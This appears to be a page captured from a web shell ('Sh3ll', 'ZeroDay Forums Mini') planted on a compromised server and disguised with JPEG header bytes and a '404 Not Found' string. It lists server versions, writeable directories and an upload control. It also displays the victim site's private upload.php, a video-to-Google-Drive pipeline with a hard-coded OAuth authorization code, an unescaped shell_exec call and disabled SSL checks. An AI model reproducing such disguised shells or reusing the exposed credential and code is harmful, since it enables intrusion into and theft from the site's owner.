ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/hls.123vid.net/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/hls.123vid.net/upload.php
<?php
set_time_limit(0);
require '../123vid/vendor/autoload.php';
function str_encode($data,$pwd)
{
    $x = 0;
    $a = 0;
    $j = 0;
    $Zcrypt = '';
    $pwd_length = strlen($pwd);
    for ($i = 0; $i < 255; $i++) {
        $key[$i] = ord(substr($pwd, ($i % $pwd_length)+1, 1));
        $counter[$i] = $i;
    }
    for ($i = 0; $i < 255; $i++) {
        $x = ($x + $counter[$i] + $key[$i]) % 256;
        $temp_swap = $counter[$i];
        $counter[$i] = $counter[$x];
        $counter[$x] = $temp_swap;
    }
    for ($i = 0; $i < strlen($data); $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $counter[$a]) % 256;
        $temp = $counter[$a];
        $counter[$a] = $counter[$j];
        $counter[$j] = $temp;
        $k = $counter[(($counter[$a] + $counter[$j]) % 256)];
        $Zcipher = ord(substr($data, $i, 1)) ^ $k;
        $Zcrypt .= chr($Zcipher);
    }
    return $Zcrypt;
}
function curl_func($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    $head[] = "Connection: keep-alive";
    $head[] = "Keep-Alive: 300";
    $head[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
    $head[] = "Accept-Language: en-us,en;q=0.5";
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
x-client-data: CJW2yQEIpbbJAQjBtskBCKmdygEYu7rKARiavsoB');
    curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
    curl_setopt($ch, CURLOPT_REFERER, 'https://m.youtube.com');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
    $page = curl_exec($ch);
    curl_close($ch);
    return $page;
}
function getClient()
{
    $client = new Google_Client();
    $client->setApplicationName('Google Drive API PHP Quickstart');
    $client->setScopes(Google_Service_Drive::DRIVE);
    $client->setAuthConfig('credentials.json');
    $client->setAccessType('offline');
    $client->setPrompt('select_account consent');

    // Load previously authorized token from a file, if it exists.
    // The file token.json stores the user's access and refresh tokens, and is
    // created automatically when the authorization flow completes for the first
    // time.
    $tokenPath = 'token/token.json';

    if (file_exists($tokenPath)) {
        $accessToken = json_decode(file_get_contents($tokenPath), true);
        $client->setAccessToken($accessToken);
    }

    // If there is no previous token or it's expired.
    if ($client->isAccessTokenExpired()) {
        // Refresh the token if possible, else fetch a new one.
        if ($client->getRefreshToken()) {
            $client->fetchAccessTokenWithRefreshToken($client->getRefreshToken());
        } else {
            // Request authorization from the user.
            /*$authUrl = $client->createAuthUrl();
            printf("Open the following link in your browser:\n%s\n", $authUrl);
            print 'Enter verification code: ';*/
            //$authCode = trim(fgets(STDIN));
            $authCode = '4/1wHkQiMjA0GZnGYPksVMTJtSx6oOyy1qmF8t0UST4SMxVq3YNsE5femsBMgHnZ4CLukmYrMRTHeb_HLVSVL4y10';
            // Exchange authorization code for an access token.
            $accessToken = $client->fetchAccessTokenWithAuthCode($authCode);
            $client->setAccessToken($accessToken);

            // Check to see if there was an error.
            if (array_key_exists('error', $accessToken)) {
                throw new Exception(join(', ', $accessToken));
            }
        }
        // Save the token to a file.
        if (!file_exists(dirname($tokenPath))) {
            mkdir(dirname($tokenPath), 0777, true);
        }
        file_put_contents($tokenPath, json_encode($client->getAccessToken()));
    }
    return $client;
}

$id = md5($_FILES['file']['name']).'-'.uniqid().'-'.time().'_';
$out3 = shell_exec('ffmpeg -i '.$_FILES['file']['tmp_name'].' -codec: copy -bsf:v h264_mp4toannexb -start_number 0 -hls_time 20 -hls_list_size 0 -f hls /var/www/html/hls.123vid.net/cache/hls/filename_'.$id.'.m3u8');

$client = getClient();
$service = new Google_Service_Drive($client);
//Insert a file
$file = new Google_Service_Drive_DriveFile();
$files_up = glob('cache/hls/*'); // get all file names
$content_list = file_get_contents('cache/hls/filename_'.$id.'.m3u8');

ob_end_flush();
ob_start();

foreach($files_up as $file_up){ // iterate files
    if(strpos($file_up,'filename_'.$id.'.m3u8')===false) {
        if(is_file($file_up)) {
            $file->setName(uniqid() . '.txt');
            $file->setDescription('docs file');
            $file->setMimeType('application/octet-stream');
            $data = file_get_contents($file_up);
            $createdFile = $service->files->create($file, array(
                'data' => $data,
                'mimeType' => 'application/octet-stream',
                'uploadType' => 'multipart'
            ));
            $id_return = $createdFile->id;
            $content_list = str_replace(basename($file_up), 'https://hls.123vid.net/ts.php?id=' . bin2hex(str_encode($id_return, 'ngocgiac')), $content_list);
            //$ob_id = json_decode($createdFile);
            unlink($file_up);
        }
    }
    flush();
    ob_flush();
}
$month_now = date('m-Y');
if(!is_dir("store/".$month_now."/")) {
    mkdir("store/".$month_now."/");
}
if(!file_exists('store/'.$month_now.'/new_'.$id.'.m3u8')){
    file_put_contents('store/'.$month_now.'/new_'.$id.'.m3u8', $content_list);
}
unlink('cache/hls/filename_'.$id.'.m3u8');
$arr['status'] = 'ok';
$arr['path'] = 'https://hls.123vid.net/store/'.$month_now.'/new_'.$id.'.m3u8';
$arr['file_name'] = $_FILES['file']['name'];
echo json_encode($arr);
exit();

header('Content-type:application/json;charset=utf-8');
try {
    if (
        !isset($_FILES['file']['error']) ||
        is_array($_FILES['file']['error'])
    ) {
        throw new RuntimeException('Invalid parameters.');
    }

    switch ($_FILES['file']['error']) {
        case UPLOAD_ERR_OK:
            break;
        case UPLOAD_ERR_NO_FILE:
            throw new RuntimeException('No file sent.');
        case UPLOAD_ERR_INI_SIZE:
        case UPLOAD_ERR_FORM_SIZE:
            throw new RuntimeException('Exceeded filesize limit.');
        default:
            throw new RuntimeException('Unknown errors.');
    }

    $filepath = sprintf('token/%s_%s', uniqid(), $_FILES['file']['name']);
    /*if (!move_uploaded_file(
        $_FILES['file']['tmp_name'],
        $filepath
    )) {
        throw new RuntimeException('Failed to move uploaded file.');
    }*/

    // All good, send the response
    echo json_encode([
        'status' => 'ok',
        'path' => $filepath
    ]);

} catch (RuntimeException $e) {
    // Something went wrong, send the err message as JSON
    http_response_code(400);

    echo json_encode([
        'status' => 'error',
        'message' => $e->getMessage()
    ]);
}
?>

ZeroDay Forums Mini